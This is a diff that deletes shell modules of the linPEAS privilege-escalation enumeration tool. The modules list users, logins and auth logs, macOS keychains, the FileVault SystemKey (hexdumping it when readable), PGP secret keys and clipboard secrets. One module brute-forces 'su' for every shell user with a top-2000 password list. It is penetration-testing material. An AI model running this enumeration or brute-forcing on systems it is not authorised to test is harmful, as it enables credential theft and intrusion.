-  no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq)
-  unexpected_shells=""
-  printf "%s\n" "$no_shells" | while read f; do
-    if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then
-      unexpected_shells="$f\n$unexpected_shells"
-    fi
-  done
-  grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
-  if [ "$unexpected_shells" ]; then
-    printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g"
-    echo "Unexpected users with shells:"
-    printf "%s\n" "$unexpected_shells" | while read f; do
-      if [ "$f" ]; then
-        grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g"
-      fi
-    done
-  fi
-fi
-echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/13_Users_groups.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/13_Users_groups.sh
@ -1,22 +0,0 @@
-# Title: Users Information - Users & groups
-# ID: UG_Users_groups
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Get all users & groups
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title
-# Global Variables: $groupsB, $groupsVB, $knw_grps, $knw_usrs, $MACPEAS, $nosh_usrs, $sh_usrs, $USER
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-print_2title "All users & groups"
-if [ "$MACPEAS" ]; then
-  dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
-else
-  cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
-fi
-echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/14_Login_now.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/14_Login_now.sh
@ -1,57 +0,0 @@
-# Title: Users Information - Login now
-# ID: UG_Login_now
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Check currently logged in users and their sessions
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title
-# Global Variables: $knw_usrs, $nosh_usrs, $sh_usrs, $USER
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-print_2title "Currently Logged in Users"
-
-# Check basic user information
-echo ""
-print_3title "Basic user information"
-(w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
-
-# Check for active sessions
-echo ""
-print_3title "Active sessions"
-if command -v w >/dev/null 2>&1; then
-  w 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
-fi
-
-# Check for logged in users via utmp
-echo ""
-print_3title "Logged in users (utmp)"
-if [ -f "/var/run/utmp" ]; then
-  who -a 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
-fi
-
-# Check for SSH sessions
-echo ""
-print_3title "SSH sessions"
-if command -v ss >/dev/null 2>&1; then
-  ss -tnp | grep ":22" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
-fi
-
-# Check for screen sessions
-echo ""
-print_3title "Screen sessions"
-if command -v screen >/dev/null 2>&1; then
-  screen -ls 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
-fi
-
-# Check for tmux sessions
-echo ""
-print_3title "Tmux sessions"
-if command -v tmux >/dev/null 2>&1; then
-  tmux list-sessions 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
-fi
-echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/15_Last_logons.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/15_Last_logons.sh
@ -1,55 +0,0 @@
-# Title: Users Information - Last logons
-# ID: UG_Last_logons
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Check last logons and login history
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title
-# Global Variables: $knw_usrs, $nosh_usrs, $sh_usrs, $USER
-# Initial Functions:
-# Generated Global Variables: $EXISTS_FINGER, $ushell
-# Fat linpeas: 0
-# Small linpeas: 1
-
-print_2title "Last Logons and Login History"
-
-# Check last logins
-echo ""
-print_3title "Last logins"
-if command -v last >/dev/null 2>&1; then
-  last -n 20 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
-fi
-
-# Check failed login attempts
-echo ""
-print_3title "Failed login attempts"
-if command -v lastb >/dev/null 2>&1; then
-  lastb -n 20 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
-fi
-
-# Check auth logs for recent logins
-echo ""
-print_3title "Recent logins from auth.log (limit 20)"
-if [ -f "/var/log/auth.log" ]; then
-  grep -i "login\|authentication\|accepted" /var/log/auth.log 2>/dev/null | tail -n 20 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
-fi
-
-# Last time logon each user
-echo ""
-if command -v lastlog >/dev/null 2>&1; then
-  print_3title "Last time logon each user"
-  lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
-fi
-
-EXISTS_FINGER="$(command -v finger 2>/dev/null || echo -n '')"
-if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then
-  dscl . list /Users | while read un; do
-    ushell=$(dscl . -read "/Users/$un" UserShell | cut -d " " -f2)
-    if grep -q "$ushell" /etc/shells; then #Shell user
-      finger "$un" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
-      echo ""
-    fi
-  done
-fi
-echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/17_Password_policy.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/17_Password_policy.sh
@ -1,32 +0,0 @@
-# Title: Users Information - Password policy
-# ID: UG_Password_policy
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Get assword policy
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: echo_not_found, print_2title
-# Global Variables: $EXTRA_CHECKS, $MACPEAS
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-if [ "$EXTRA_CHECKS" ]; then
-  print_2title "Password policy"
-  grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs"
-  echo ""
-
-  if [ "$MACPEAS" ]; then
-    print_2title "Relevant last user info and user configs"
-    defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null
-    echo ""
-
-    print_2title "Guest user status"
-    sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
-    sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
-    sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
-    echo ""
-  fi
-fi
--- a/linPEAS/builder/linpeas_parts/6_users_information/18_Brute_su.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/18_Brute_su.sh
@ -1,31 +0,0 @@
-# Title: Users Information - Brute su
-# ID: UG_Brute_su
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Brute su
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: check_if_su_brute, print_2title, su_brute_user_num
-# Global Variables: $IAMROOT, $PASSTRY, $TIMEOUT
-# Initial Functions:
-# Generated Global Variables: $SHELLUSERS, $POSSIBE_SU_BRUTE
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ]; then
-  print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC
-  POSSIBE_SU_BRUTE=$(check_if_su_brute);
-  if [ "$POSSIBE_SU_BRUTE" ]; then
-    SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1)
-    printf "%s\n" "$SHELLUSERS" | while read u; do
-      echo "  Bruteforcing user $u..."
-      su_brute_user_num "$u" $PASSTRY
-    done
-  else
-    printf $GREEN"It's not possible to brute-force su.\n\n"$NC
-  fi
-else
-  print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)\n"$NC
-fi
-print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC
--- a/linPEAS/builder/linpeas_parts/6_users_information/1_Macos_my_user_hooks.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/1_Macos_my_user_hooks.sh
@ -1,20 +0,0 @@
-# Title: Users Information - MacOS my user hooks
-# ID: UG_Macos_my_user_hooks
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Get current user Login and Logout hooks
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title
-# Global Variables: $HOME, $MACPEAS
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-if [ "$MACPEAS" ];then
-  print_2title "Current user Login and Logout hooks"
-  defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
-  echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/6_users_information/1_My_user.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/1_My_user.sh
@ -1,19 +0,0 @@
-# Title: Users Information - My User
-# ID: UG_My_user
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: My User
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_info
-# Global Variables: $groupsB, $groupsVB, $idB, $knw_grps , $knw_usrs, $nosh_usrs,$sh_usrs, $USER
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-print_2title "My user"
-print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#users"
-(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
-echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/2_Macos_user_hooks.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/2_Macos_user_hooks.sh
@ -1,25 +0,0 @@
-# Title: Users Information - MacOS user hooks
-# ID: UG_Macos_user_hooks
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Enumerate all users login and logout hooks
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title
-# Global Variables: $MACPEAS 
-# Initial Functions:
-# Generated Global Variables: $user_home
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-if [ "$MACPEAS" ];then
-  print_2title "All Login and Logout hooks"
-  for user_home in /Users/*/ /private/var/root/; do
-    if [ -f "${user_home}Library/Preferences/com.apple.loginwindow.plist" ]; then
-      echo "User: $(basename "$user_home")" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-      defaults read "${user_home}Library/Preferences/com.apple.loginwindow.plist" 2>/dev/null | grep -e "Hook" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
-    fi
-  done
-  echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/6_users_information/3_Macos_keychains.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/3_Macos_keychains.sh
@ -1,29 +0,0 @@
-# Title: Users Information - MacOS Keychains
-# ID: UG_Macos_keychains
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Get macOS keychains information
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_info
-# Global Variables: $MACPEAS
-# Initial Functions:
-# Generated Global Variables: $user_home
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-if [ "$MACPEAS" ];then
-  print_2title "Keychains"
-  print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#chainbreaker"
-  echo "System Keychains:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-  security list-keychains 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
-  echo -e "\nUser Keychains:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-  for user_home in /Users/*/; do
-    if [ -d "${user_home}Library/Keychains" ]; then
-      echo "- User: $(basename "$user_home")" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-      ls -la "${user_home}Library/Keychains/" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
-    fi
-  done
-  echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/6_users_information/4_Macos_systemkey.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/4_Macos_systemkey.sh
@ -1,28 +0,0 @@
-# Title: Users Information - MacOS SystemKey
-# ID: UG_Macos_systemkey
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Get macOS SystemKey information (used for FileVault encryption)
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title
-# Global Variables: $MACPEAS
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-if [ "$MACPEAS" ];then
-  print_2title "SystemKey"
-  echo "The SystemKey is used by FileVault to encrypt/decrypt the volume. If you can read it, you might be able to decrypt the disk."
-  echo -e "\nSystemKey file permissions:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-  ls -l /var/db/SystemKey 2>/dev/null | sed -${E} "s,.*,${SED_RED_YELLOW},g"
-  
-  if [ -r "/var/db/SystemKey" ]; then
-    echo -e "\nWARNING: You can read /var/db/SystemKey!" | sed -${E} "s,.*,${SED_RED},g"
-    echo "SystemKey content (first 24 bytes after header):" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-    hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},g"
-  fi
-  echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/6_users_information/5_Pgp_keys.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/5_Pgp_keys.sh
@ -1,49 +0,0 @@
-# Title: Users Information - PGP keys
-# ID: UG_Pgp_keys
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Check for PGP keys and related files that might contain sensitive information
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: echo_not_found, print_2title, print_info
-# Global Variables: $HOME
-# Initial Functions:
-# Generated Global Variables: $pgp_file
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-print_2title "PGP Keys and Related Files"
-print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#pgp-keys"
-
-# Check for GPG
-echo "GPG:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-if command -v gpg >/dev/null 2>&1; then
-  echo "GPG is installed, listing keys:"
-  gpg --list-keys 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
-  # Check for private keys
-  gpg --list-secret-keys 2>/dev/null | sed -${E} "s,.*,${SED_RED_YELLOW},g"
-else
-  echo_not_found "gpg"
-fi
-
-# Check for NetPGP
-echo -e "\nNetPGP:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-if command -v netpgpkeys >/dev/null 2>&1; then
-  echo "NetPGP is installed" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
-  netpgpkeys --list-keys 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
-else
-  echo_not_found "netpgpkeys"
-fi
-
-# Check for common PGP files
-echo -e "\nPGP Related Files:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-for pgp_file in "$HOME/.gnupg" "$HOME/.pgp" "$HOME/.openpgp" "$HOME/.ssh/gpg-agent.conf" "$HOME/.config/gpg"; do
-  if [ -e "$pgp_file" ]; then
-    echo "Found: $pgp_file"
-    if [ -d "$pgp_file" ]; then
-      ls -la "$pgp_file" 2>/dev/null
-    fi
-  fi
-done
-echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/6_Clipboard_highlighted_text.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/6_Clipboard_highlighted_text.sh
@ -1,53 +0,0 @@
-# Title: Users Information - Clipboard and highlighted text
-# ID: UG_Clipboard_highlighted_text
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Check clipboard and highlighted text for sensitive information
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: echo_not_found, print_2title, print_info
-# Global Variables: $DEBUG, $pwd_inside_history
-# Initial Functions:
-# Generated Global Variables: $content
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-if [ "$(command -v xclip 2>/dev/null || echo -n '')" ] || [ "$(command -v xsel 2>/dev/null || echo -n '')" ] || [ "$(command -v pbpaste 2>/dev/null || echo -n '')" ] || [ "$(command -v wl-paste 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then
-  print_2title "Clipboard and Highlighted Text"
-  print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#clipboard"
-
-  # Function to check clipboard content
-  check_clipboard() {
-    local content="$1"
-    if [ -n "$content" ]; then
-      echo "$content" | sed -${E} "s,$pwd_inside_history,${SED_RED},g" | sed -${E} "s,(password|passwd|pwd).*=.*,${SED_RED},g" | sed -${E} "s,(token|key|secret).*=.*,${SED_RED},g"
-    fi
-  }
-
-  # Check different clipboard tools
-  if [ "$(command -v xclip 2>/dev/null || echo -n '')" ]; then
-    echo "Using xclip:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-    echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-    check_clipboard "$(xclip -o -selection clipboard 2>/dev/null)"
-    echo "Highlighted text:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-    check_clipboard "$(xclip -o 2>/dev/null)"
-  elif [ "$(command -v xsel 2>/dev/null || echo -n '')" ]; then
-    echo "Using xsel:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-    echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-    check_clipboard "$(xsel -ob 2>/dev/null)"
-    echo "Highlighted text:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-    check_clipboard "$(xsel -o 2>/dev/null)"
-  elif [ "$(command -v pbpaste 2>/dev/null || echo -n '')" ]; then
-    echo "Using pbpaste:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-    echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-    check_clipboard "$(pbpaste 2>/dev/null)"
-  elif [ "$(command -v wl-paste 2>/dev/null || echo -n '')" ]; then
-    echo "Using wl-paste:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-    echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-    check_clipboard "$(wl-paste 2>/dev/null)"
-  else
-    echo_not_found "clipboard tools (xclip, xsel, pbpaste, wl-paste)"
-  fi
-  echo ""
-fi
--- a/Show More
+++ b/Show More